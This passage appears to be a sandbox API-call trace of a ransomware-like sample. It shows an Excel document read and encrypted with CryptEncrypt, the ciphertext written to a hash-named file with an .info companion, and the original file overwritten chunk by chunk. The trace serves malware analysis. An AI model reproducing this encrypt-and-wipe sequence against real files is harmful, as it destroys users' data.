hTemplateFile=0x0) returned 0x36c [0073.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.638] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0073.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.639] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x21b0358, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0073.639] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.639] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0073.639] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21b0448, pdwDataLen=0x1bf5db30 | out: pbData=0x21b0448*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0073.639] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x21b0568, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0073.639] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.639] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.640] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626b40) returned 1 [0073.640] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.640] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x4, pbData=0x21b06b0*=0x1, dwFlags=0x0) returned 1 [0073.640] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x1, pbData=0x21b0660, dwFlags=0x0) returned 1 [0073.640] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0073.640] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0073.640] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0073.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0073.640] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", lpFilePart=0x0) returned 0x48 [0073.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0073.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\68c0515135daea384e9fdd44870a892e"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0073.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0073.641] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0a90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21b0a90*, lpNumberOfBytesRead=0x1bf5da28*=0xec4a, lpOverlapped=0x0) returned 1 [0073.642] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21c4aa8*, pdwDataLen=0x1bf5da80*=0xec40, dwBufLen=0xec40 | out: pbData=0x21c4aa8*, pdwDataLen=0x1bf5da80*=0xec40) returned 1 [0073.642] WriteFile (in: hFile=0x380, lpBuffer=0x21c4aa8*, nNumberOfBytesToWrite=0xec40, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x21c4aa8*, lpNumberOfBytesWritten=0x1bf5da18*=0xec40, lpOverlapped=0x0) returned 1 [0073.644] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0a90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21b0a90*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0073.644] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21d3728*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x21d3728*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0073.644] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21d3778*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x21d3778*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0073.644] WriteFile (in: hFile=0x380, lpBuffer=0x21d37c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x21d37c8*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0073.644] CloseHandle (hObject=0x380) returned 1 [0073.646] CloseHandle (hObject=0x36c) returned 1 [0073.646] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0073.646] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0073.646] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0073.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E", lpFilePart=0x0) returned 0x48 [0073.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0073.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\68c0515135daea384e9fdd44870a892e"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.646] GetFileType (hFile=0x36c) returned 0x1 [0073.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0073.646] GetFileType (hFile=0x36c) returned 0x1 [0073.646] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.647] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.648] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.650] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.650] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.651] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.652] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0xc50, lpOverlapped=0x0) returned 1 [0073.652] ReadFile (in: hFile=0x36c, lpBuffer=0x21d4ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21d4ec0*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0073.652] CloseHandle (hObject=0x36c) returned 1 [0073.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E.info", lpFilePart=0x0) returned 0x4d [0073.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0073.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\68C0515135DAEA384E9FDD44870A892E.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\68c0515135daea384e9fdd44870a892e.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.702] GetFileType (hFile=0x36c) returned 0x1 [0073.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0073.702] GetFileType (hFile=0x36c) returned 0x1 [0073.702] WriteFile (in: hFile=0x36c, lpBuffer=0x21e1580*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x21e1580*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0073.703] CloseHandle (hObject=0x36c) returned 1 [0073.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0073.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x749a5680, ftCreationTime.dwHighDateTime=0x1d4ce34, ftLastAccessTime.dwLowDateTime=0xe24b1360, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xe24b1360, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xec4a)) returned 1 [0073.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0073.705] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.705] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", dwFileAttributes=0x80) returned 1 [0073.705] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0073.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x21e9198 | out: lpFileInformation=0x21e9198*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x749a5680, ftCreationTime.dwHighDateTime=0x1d4ce34, ftLastAccessTime.dwLowDateTime=0xe24b1360, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xe24b1360, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xec4a)) returned 1 [0073.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0073.705] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx", lpFilePart=0x0) returned 0x40 [0073.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0073.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FEpSAid6DzqAar5Swvy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fepsaid6dzqaar5swvy.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.705] GetFileType (hFile=0x36c) returned 0x1 [0073.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0073.705] GetFileType (hFile=0x36c) returned 0x1 [0073.705] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.706] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.707] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.708] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.708] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.709] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.710] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.711] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.711] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.712] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.713] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.714] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.714] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.715] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.716] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.716] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5daa8*=0xe00, lpOverlapped=0x0) returned 1 [0073.716] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.717] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.718] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.719] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.719] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.720] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.721] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.722] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.722] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.723] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.724] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.724] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.725] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.726] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.727] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.727] WriteFile (in: hFile=0x36c, lpBuffer=0x21e9680*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21e9680*, lpNumberOfBytesWritten=0x1bf5daa8*=0xe00, lpOverlapped=0x0) returned 1 [0073.727] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, 